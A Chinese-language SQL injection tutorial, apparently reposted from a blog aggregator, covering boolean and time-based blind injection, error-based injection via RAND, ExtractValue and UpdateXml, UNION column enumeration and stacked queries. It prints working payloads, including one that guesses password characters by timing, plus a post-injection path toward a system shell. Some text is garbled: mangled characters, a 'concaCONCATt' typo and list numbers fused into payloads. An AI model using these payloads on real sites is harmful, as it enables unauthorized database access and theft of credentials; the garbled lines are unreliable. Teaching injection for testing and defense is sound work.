mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入
盲注
關(guān)鍵點(diǎn)是 根據(jù)頁(yè)面返回內(nèi)容分析 Payload 中的問(wèn)題是否為真,然后通過(guò)多次測(cè)試遍歷出想要的數(shù)據(jù)
布爾盲注
目標(biāo)地址:http://newspaper.com/items.php?id=2
對(duì)應(yīng)的SQL語(yǔ)句:SELECT title, description, body FROM items WHERE ID = 2
然后攻擊者嘗試返回 false 的查詢:http://newspaper.com/items.php?id=2 and 1=2
對(duì)應(yīng)的SQL語(yǔ)句:SELECT title, description, body FROM items WHERE ID = 2 and 1=2
如果網(wǎng)頁(yè)應(yīng)用存在 SQL 注入漏洞,那么其可能不會(huì)返回?cái)?shù)據(jù)。為了確認(rèn)這一點(diǎn),攻擊者會(huì)再次注入一次返回 true 的查詢:http://newspaper.com/items.php?id=2 and 1=1
如果前后兩次查詢返回的網(wǎng)頁(yè)內(nèi)容不同,攻擊者就能夠通過(guò)組合 Payload 遍歷出想要的數(shù)據(jù)。
時(shí)間盲注猜測(cè)密碼的首字符是否為 ‘2’,是的話等待10秒。
對(duì)應(yīng) MySQL 語(yǔ)句為 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;
報(bào)錯(cuò)注入完整的語(yǔ)句如 SELECT * FROM xxx WHERE id=1 AND ({Payload}),{Payload} 詳細(xì)內(nèi)容見(jiàn)下文
關(guān)鍵點(diǎn)是 構(gòu)造錯(cuò)誤信息,讓自己想要的數(shù)據(jù)被輸出到錯(cuò)誤信息中
RAND
SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x
RAND(0) 0為隨機(jī)函數(shù)的種子,該函數(shù)產(chǎn)生浮點(diǎn)數(shù)v,且v的范圍為 0 <= v < 1.0
FLOOR(X) 取不大于 X 的最大整數(shù)
FLOOR(RAND(0)*2) 返回 0 或 1
0x3a 是 “:” 的 Unicode,單純?yōu)榱似唇雍每?/p>
CONCAT() 拼接字符串
GROUP BY 按拼接字符串分組
COUNT(*) 記錄的總數(shù),這里會(huì)阻止 GROUP BY 直接優(yōu)化得到 0 和 1 的結(jié)果
結(jié)合以上內(nèi)容,當(dāng) FLOOR(RAND(0)*2) 出現(xiàn)重復(fù)值時(shí),數(shù)據(jù)庫(kù)會(huì)報(bào)錯(cuò),報(bào)錯(cuò)信息類似 Error: Duplicate entry ‘5.1.73-0ubuntu0.10.04.1:1’ for key ‘group_key’
這樣我們就可以從報(bào)錯(cuò)信息中獲取到我們想要的信息,這次是數(shù)據(jù)庫(kù)版本。
rand 的結(jié)果是隨機(jī)的,也可以選擇以下兩種函數(shù)來(lái)構(gòu)造錯(cuò)誤信息。
ExtractValue
Description: 查詢 XML 文檔的函數(shù)
Payload: ExtractValue(1,CONCAT(0x7e,(SELECT version()),0x7e))
Output: - XPATH syntax error: '~5.5.53~'
UpdateXml
Description: 修改 XML 文檔的函數(shù)
Payload: UpdateXml(1,concaCONCATt(0x7e,(SELECT user()),0x7e),1)
Output: - XPATH syntax error: '~5.5.53~'
UNION 查詢注入U(xiǎn)NION 語(yǔ)句合并多個(gè) SELECT 語(yǔ)句的結(jié)果并返回
關(guān)鍵點(diǎn):UNION 連接的多個(gè) SELECT 語(yǔ)句中,每一列的數(shù)據(jù)類型應(yīng)該相同,且選中相同數(shù)量的列。對(duì)于 Oracle 數(shù)據(jù)庫(kù),還要求 SELECT 必須使用 FORM 指定一個(gè)有效的表名。
確定列的數(shù)量使用 ORDER BY
依次使用以下序列中的語(yǔ)句,直到報(bào)錯(cuò),如 The ORDER BY position number 3 is out of range of the number of items in the select list,進(jìn)而確認(rèn)列的數(shù)量。
1
2
31 ORDER BY 1--
1 ORDER BY 2--
1 ORDER BY 3--
使用 UNION SELECE NULL,...
NULL 可以被轉(zhuǎn)為任意數(shù)據(jù)類型,所以這里可以用來(lái)作為返回值。
依次使用以下序列中的語(yǔ)句,直到報(bào)錯(cuò),如 All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists,進(jìn)而確認(rèn)列的數(shù)量。
1
2
31 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--
找到字符串類型的列
同樣的,可以依次嘗試以下序列:
1
2
3
41 UNION SELECT 'a',NULL,NULL,NULL--
1 UNION SELECT NULL,'a',NULL,NULL--
1 UNION SELECT NULL,NULL,'a',NULL--
1 UNION SELECT NULL,NULL,NULL,'a'--
如果對(duì)應(yīng)的列與字符串類型不兼容,就會(huì)報(bào)錯(cuò),如 Conversion failed when converting the varchar value ‘a(chǎn)’ to data type int ,所以如果不報(bào)錯(cuò),我們就找到了字符串類型的列。
覆蓋原有數(shù)據(jù)
注入點(diǎn)一般在 WHERE 處,使用 1 AND false UNION SELECT ... 將原有輸出覆蓋。
堆疊注入
堆疊注入指的是被注入方允許同時(shí)執(zhí)行多條語(yǔ)句,那么攻擊者就可以利用額外的語(yǔ)句完成任何操作。
敏感數(shù)據(jù)
成功注入后,接下來(lái)的流程一般是:
獲取當(dāng)前用戶/數(shù)據(jù)庫(kù)
獲取用戶名和密碼
枚舉數(shù)據(jù)庫(kù)/表/列
嘗試獲取系統(tǒng) shell
結(jié)合利用其他漏洞
Reference
總結(jié)
以上是生活随笔為你收集整理的mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: mysql 前缀索引 语法_PHP 之M
- 下一篇: mysql相交_MySQL相交